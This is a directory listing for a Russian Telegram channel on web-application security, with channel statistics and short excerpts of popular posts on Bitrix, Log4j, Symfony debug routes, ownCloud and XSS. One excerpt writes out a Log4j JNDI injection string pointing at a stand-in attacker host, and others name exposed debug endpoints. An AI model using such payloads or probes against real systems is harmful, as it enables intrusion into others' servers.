Telagon
/
Кавычка avatar

Кавычка— Telegram Channel

@webpwnChannelEN

Практическая безопасность. Уязвимости и атаки на веб-приложения. Чат @WebPwnChat Только авторский контент, без репостов и рекламы (простите). Вместо лайка: https://t.me/webpwn?boost Платный канал: https://t.me/tribute/app?startapp=s2Vr

ПубличныйОбновлён 29 март 2026

О канале

9/10

This channel provides a platform for discussing and sharing knowledge about web application security. It covers various topics such as web application vulnerabilities, exploitation techniques, and defensive strategies. The content is presented in a clear and concise manner, making it accessible to both beginners and experienced security professionals.

Аудитория

security professionals

Контент

news, discussion

Активность

active 24/7

Тональность

neutral

ТехнологииБезопасностьweb securityvulnerabilitiesexploitationdefensehacking

Статистика

Возраст
10y 1m
Созданмарт 2016
Подписчики
16.2K
день-4
неделя-6
Публикации
300
вчера0
неделя0
месяц0
Ср. охват поста
Индекс упоминаний
Каналов6
Упоминаний6
Репостов44.1K
Вовлечённость
Охват / Вовлечённость
Premium

Рост подписчиков

день -4неделя -6
16.2K16.2K16.2K16.2K16.2K2026-03-232026-03-272026-03-292026-03-312026-04-03
16.2K16.2K

Упомянутые каналы

Упоминают этот канал

Уязвимости и атаки на CMS Bitrix 1. Особенности 2. Уязвимости 3. Методы атак Приятного чтения! P.S. Автор crlf

May 23, 2022112.1K3.5K190

Вчера в официальном репозитории PHP на Github появилось два бэкдора, позволяющие выполнять произвольный код. Что произошло - неясно. Однако разработчики сообщают о возможной компрометации git.php.net.…

Mar 29, 2021110.1K544

У половины интернета нашли выполнение произвольного кода через Log4j. Выглядит это так: 1) Посылаем специально сформированный запрос вида ${jndi:ldap://attacker.host/blabla} в любое место, которое…

Dec 10, 202178.2K2.9K1

Но не все знают, что можно вызвать /app_dev.php/_configurator, который запустит установку движка (оно тебе надо?). Если этот контроллер доступен, интереснее вызвать сразу последнюю страницу /app_dev.…

May 17, 202170.1K279

В фреймворке Symfony иногда не отключают профайлер, который может помочь получить различную техническую информацию о целевой системе. Находится он в роуте app_dev.php.

May 17, 202166.1K200

Многие юзают инфу о выданных сертификатах, чтобы узнать поддомены компании, например в crt.sh Но не только лишь все знают, как узнать другие домены одного владельца в ru зоне. Раньше для этого юзал 1…

Oct 17, 202443.6K1K245

Что опасного в публичном отображении phpinfo? Сдаешь такой в багбаунти, а тебе говорят, ну где импакт, CVSS 2.6? А ты такой, ну смотри какой импакт: - Дает узнать о конфигурации PHP, в том числе о в…

Aug 1, 202437.5K222326

#owncloud Для owncloud была классная CVE-2023-49105 Сплоет реализован в качестве прокси, которая подписывает запросы и можно через нее ходить на dav://, используя клиент Filezilla, Cyberduck, короч…

May 16, 202435K213102

#OSINT #SSH Вспомнил тут про старый трюк, можно тестануть: ssh whoami.filippo.io Короч, когда ты подключаешься по ssh, твой ssh-agent перебирает всеми ключами, которые у тебя в него подключены. Это…

May 14, 202427K421162

В дискуссии спросили, ну чего опасного в том, что есть XSS на поддомене без юзеров. Допустим, есть у нас site.kek, а ты нашел уязвимость на subdomain.site.kek Что может дать XSS на поддомене, где обы…

Apr 12, 202427.6K203143

Отзывы

Отзывов пока нет

Будьте первым, кто поделится мнением об этом канале.

Рейтинги

channels / EN
ДеньНеделяМесяцГодВсё время
Подписчики#15721из 34.1K
Упоминания#665из 9.3K